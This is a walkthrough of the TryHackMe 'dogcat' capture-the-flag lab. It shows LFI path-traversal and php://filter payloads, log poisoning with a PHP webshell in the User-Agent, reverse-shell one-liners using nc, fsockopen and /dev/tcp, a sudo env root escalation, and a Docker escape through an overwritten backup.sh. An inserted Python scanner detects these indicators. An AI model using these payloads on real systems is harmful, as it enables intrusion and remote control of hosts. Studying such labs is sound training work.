TryHackMe: dogcat

ratiros01
6 min read · Jul 12, 2020

[Enumeration]

Port scan

nmap -Pn <ip>

There are 2 open ports: 22 and 80.

OS and service scan

nmap -A -p 22,80 <ip>

Vulnerable scan

nmap --script vuln -p 22,80 <ip>

Access HTTP Site

View page source

Click cat

Click dog

Scan the site’s directories.

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html

There are 3 interesting files: flag.php, cat.php, and dog.php.

Access all of them.

dog.php

cat.php

flag.php: nothing revealed.

[Exploitation]

Back to the site: it seems the index page includes “dog.php” and “cat.php”.

Try to view “flag”. Failed!!!

Only dogs and cats are allowed.

Try to access “/etc/passwd”. Failed!!!

Try to access “./dog”

It seems I can call anything, but the text “dog” must be in the request.

Let’s append “/etc/passwd” to the request.

http://<ip>/?view=./dog/../../../../../../../../../../../../../etc/passwd

It seems I need to bypass the filter.

Using PayloadsAllTheThings

Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

I will use php://filter with base64.

Let’s intercept with Burp Suite

Send to Repeater

Let’s view index page first.

http://<ip>/?view=php://filter/convert.base64-encode/resource=./dog../../index

Success!!! The result is a base64 string.

Decode with Burp Suite’s Decoder.

Now I have the source code of index.php.

Viewing the source code.

This means I have to include “dog” or “cat” in the request, and if I don’t include the parameter “ext”, it will automatically assign “.php”.

Let’s send the request again. This time I will try to read “/etc/passwd” and include the parameter “ext”.

http://<ip>/?view=./dog../../../../../../../../etc/passwd&ext=

Success!!!

View page source; not much useful.

Next, I’ll use log poisoning.

Since I screwed up the log file, I had to terminate the machine and start again.

I will use Burp Suite Repeater to send the request

http://<ip>/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=

Success!!! Now I can access /var/log/apache2/access.log

Let’s add a command

Edit User-Agent to be:

<?php system($_GET['cmd']); ?>

Send the request as:

/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=id

Success!!!
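The traversal, php://filter and log-poisoning requests used above all leave distinctive traces in the Apache access log. As an added defender-side example (not part of this writeup), the following Python scanner parses combined-format log lines and flags those indicators; the log lines are constructed to mirror the requests in this post, and the client IP 10.0.0.1 is a placeholder.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (Apache combined log format) modelled on this writeup's requests.
SAMPLE_LOG = """
10.0.0.1 - - [12/Jul/2020:10:00:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.1 - - [12/Jul/2020:10:00:02 +0000] "GET /?view=./dog/../../../../etc/passwd HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.1 - - [12/Jul/2020:10:00:03 +0000] "GET /?view=php://filter/convert.base64-encode/resource=./dog../../index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.1 - - [12/Jul/2020:10:00:04 +0000] "GET /?view=./dog../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1" 200 9000 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.1 - - [12/Jul/2020:10:00:05 +0000] "GET /?view=cat HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def indicators(line: str) -> list:
    """Return the LFI / log-poisoning indicators present in one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    found = []
    # keep_blank_values so an empty "ext=" (used to drop the forced .php suffix) is kept
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    for raw in params.get("view", []):
        value = unquote(raw)  # second decode catches double URL-encoding
        if "../" in value or "..\\" in value:
            found.append("traversal")
        if re.match(r"^[a-z][a-z0-9+.-]*://", value):  # php://, data://, expect:// ...
            found.append("stream-wrapper")
        if "/var/log/" in value or "access.log" in value:
            found.append("log-file-include")
    agent = m.group("agent")
    if "<?php" in agent or "<?=" in agent:  # code planted for log poisoning
        found.append("php-in-user-agent")
    return found


def scan(log_text: str) -> list:
    """Return (request target, indicators) for every line that trips at least one rule."""
    hits = []
    for line in log_text.strip().splitlines():
        tags = indicators(line)
        if tags:
            hits.append((LOG_RE.match(line).group("target"), tags))
    return hits


if __name__ == "__main__":
    for target, tags in scan(SAMPLE_LOG):
        print(f"{', '.join(tags):45s} {target}")
```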

Let’s get the reverse shell.

Create listener

nc -lvp 1234

Reverse shell reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Use Burp Suite to URL-encode the command

I tried this command first:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Copy it into the request and send. Failed!!!

Since this site runs PHP, this time I will use a PHP command.

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Copy it into the request and send.

Back to the listener: now I have a shell.

[Privilege escalation]

Let’s explore the machine.

pwd
ls
cat flag.php

Now I have the first flag.

cd ..
ls

There’s flag2 in “/var/www”.

cat flag2_QMW7JvaY2LvK.txt

Let’s explore the user directories

cd /home
ls
ls -la

Nothing

Let’s check whether I can use the sudo command.

I can use “env”.

Root command reference: https://gtfobins.github.io/gtfobins/env/#sudo

sudo env /bin/sh
id

Now I’m root.

cd /root
ls
cat flag3.txt

Now I have flag3.

Let’s explore the machine further to find the last flag.

cd /tmp
ls

Nothing

cd /opt
ls -la

There’s a backups directory

cd backups
ls -la

This “backup.sh” is interesting.

cat backup.sh

This machine has Docker.

Let’s escape it

Create another listener for a reverse shell

nc -lvp 1235

Replace the former script in backup.sh with a reverse shell

echo "#!/bin/bash" > backup.sh
echo "/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1235 0>&1'" >> backup.sh

Back to the listener and wait for a while.

Now I have another shell.

ls

There’s the fourth flag.

cat flag4.txt
